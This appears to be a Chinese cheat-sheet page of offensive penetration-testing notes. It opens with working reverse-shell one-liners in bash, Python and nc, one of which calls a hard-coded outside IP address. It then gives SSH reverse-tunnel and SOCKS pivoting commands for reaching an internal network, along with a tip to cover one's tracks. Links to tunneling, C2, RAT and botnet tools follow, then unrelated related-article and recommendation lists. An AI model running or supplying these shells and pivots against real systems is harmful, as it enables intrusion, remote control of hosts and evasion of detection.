bash -i >& /dev/tcp/ip/3333 0>&1

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('149.28.133.203',333));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

nc -e /bin/sh ip 3333

python -c 'import pty; pty.spawn("/bin/bash")' 

https://www.freebuf.com/news/142195.html

reGeorgSocksProxy.py -p 9999 -u   木马

ssh -f -N -D ip:7070 xss@172.30.0.2

ssh -CfNg -D 7001  root@172.30.0.2 -p 22

A是vps主机,B,C 是内网

B: ssh -p 22 -qngfNTR "*:7777:localhost:22" root@A的vps

A主机的sshd配置文件/etc/ssh/sshd_config添加:GatewayPorts yes

在C主机上面运行:

C: ssh -p 7777 -qngfNTD 8888 root@A的vps

然后输入B主机的ssh密码,此时就可以以C主机的8888端口作为socks5代理来进入B的内网

不想输入密码可以用私钥,注意擦屁股。

http://www.ttlsa.com/linux/linux-setup-socks-5-ttlsa/

https://github.com/vzex/dog-tunnel 狗洞

https://github.com/SECFORCE/Tunna Tunna是一组将包裹和隧道通过HTTP任何TCP通信工具。它可用于绕过在充分防火墙环境中的网络的限制。

https://github.com/ahhh/Reverse_DNS_Shell 使用DNS作为C2通道蟒蛇反向壳

https://github.com/subTee/PoshRat PowerShell的反向HTTPs的壳

https://github.com/inquisb/icmpsh 简单的反向ICMP外壳

https://github.com/ring04h/rtcp2udp 反向TCP端口UDP转发工具

https://github.com/gentry0520/udptunnel 稳定的UDP反向端口映射方法

https://github.com/RicterZ/reprocks  一个Python socks5代理服务器/客户端

https://github.com/T3rry7f/tulua HTTP隧道的TCP连接

https://github.com/sweetsoftware/Ares Python的僵尸网络以及后门 战神是一个Python远程访问工具。

https://github.com/sailro/Bdtunnel BoutDuTunnel能够创建在HTTP请求隧道虚拟连接。

https://github.com/n1nj4sec/pupy Pupy是一个开源,跨平台(Windows,Linux和OSX,Android版),多功能RAT(远程管理工具

https://github.com/funkandwagnalls/ranger一个工具,支持安全专家的访问和远程基于Microsoft Windows的系统进行交互

  

提权AND反弹OR转发的更多相关文章

  1. LINUX下使用NC反弹CMDSHELL提权

    很多时候linux拿到shell了,然后在菜刀或Shell里执行简单命令不允许!说明权限很死或者被管理禁止了!这里我已NC将SHELL反弹回本地提权!先看下linux内核 2.6.18-194.11. ...

  2. NC反弹CMDSHELL提权总结

    Server-U等都不可以用的情况下.   一般都可思考用此方法不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口…   那么这种方法也失效了…. 1:通过shell将上 ...

  3. ssh远程端口转发&&windows系统提权之信息收集&&网安工具分享(部分)

    一.ssh远程端口转发 背景:当我们在渗透过程中,获取到内网的一台仅有内网IP的服务器后,我们可以通过ssh隧道,将内网某个主机的端口进行远程转发 1.网络拓扑图 假设获取的服务器为web服务器,we ...

  4. webshell提权20种思路

    1,SER-TU提权(通常是利用SERFTP服务器管理工具,首先要在安装目录下找到INI配置文件,必须具备可写入的权限)2,RADMIN提权(大家并不陌生,我们在扫描4899空口令后,同样需要他来连接 ...

  5. WIN提权总结【本地存档-转载】

    [ web提权 ] 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1 ...

  6. 记一次FileZillaServer提权

    前段时间检测一个企业网站,在检测该企业的一个下属公司的网站时通过用户名admin和密码123456进入了后台,后台目录就是公司汉语拼音+admin,诸如xxxadmin这种形式的.在后台通过“产品图片 ...

  7. 暴破助攻提权:ruadmin

    i春秋作家:yangyangwithgnu 1 缘由 千辛万苦拿下的 webshell 不是 www-data 用户就是 networkservice 权限,要想拓展攻击面.扩大战果,提权,是必经之路 ...

  8. 从getwebshell到绕过安全狗云锁提权再到利用matasploit进服务器

    本文作者:i春秋签约作家——酷帥王子 一. 利用getwebshell篇 首先对目标站进行扫描,发现是asp的,直接扫出网站后台和默认数据库,下载解密登陆如图: 下面进后台发现有fckeditor,而 ...

  9. 滥用DNSAdmins权限进行Active Directory提权

      0x00 前言 除了在实现自己的DNS服务器功能之外,Microsoft还为该服务器实现自己的管理协议以便于管理与Active Directory域集成.默认情况下,域控制器也是DNS服务器; 大 ...

随机推荐

  1. Qt中子窗口关闭之后,立即释放资源的方法

    用Qt做界面的时候,很多时候都会遇见点击一个按钮弹出一个新的窗口的功能.我在刚开始做这个功能的时候,直接是点击一次按钮就new一个新的窗口,每次都只是将子窗口关闭而已,并没有去释放子窗口的资源,这样就 ...

  2. HTML基本语法(慕课网学习笔记)

    标题 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8& ...

  3. Flink 运行时架构

    参考链接:https://blog.csdn.net/dajiangtai007/article/details/88575553 1.Flink 运行时架构 Flink 运行时架构主要包含几个部分: ...

  4. Spark Ignite踩坑记录

    Ignite spark 踩坑记录 简述 ignite访问数据有两种模式: Thin Jdbc模式: Jdbc 模式和Ignite client模式: shell客户端输出问题,不能输出全列: 针对上 ...

  5. Ubuntu下安装Python3(与旧Python2版本共存)

    官网下载Python3的源码 进行配置,在源码目录运行如下命令. ./configure --prefix=/usr/local/python3 --enable-shared 进行编译,在源码目录运 ...

  6. .Net中异步任务的取消和监控

    相关类型: CancellationTokenSource 主要用来创建或取消令牌 CancellationToken 监听令牌状态,注册令牌取消事件 OperationCanceledExcepti ...

  7. BUUCTF-[CISCN2019 总决赛 Day2 Web1]Easyweb

    BUUCTF-[CISCN2019 总决赛 Day2 Web1]Easyweb 就给了一个这个... 先打上robots.txt看看 发现有源码备份,但不是index.php.bak... 看源码发现 ...

  8. Swing常用容器

    3.Swing(AWT的子类) 3.1窗口.面板 public class myJFrame extends JFrame { //JFrame是一个顶级窗口 public myJFrame() { ...

  9. sqlite数据库的基本用法及C语言的API接口简介

    ********************sqlite数据库******************** http://www.sqlite.org/c3ref/intro.html 1-- 安装数据库: ...

  10. BFD协议简介

    1. 背景 双向转发检测BFD(Bidirectional Forwarding Detection)是一种全网统一的检测机制,用于快速检测.监控网络中链路或者IP路由的转发连通状况. 为了保护关键应 ...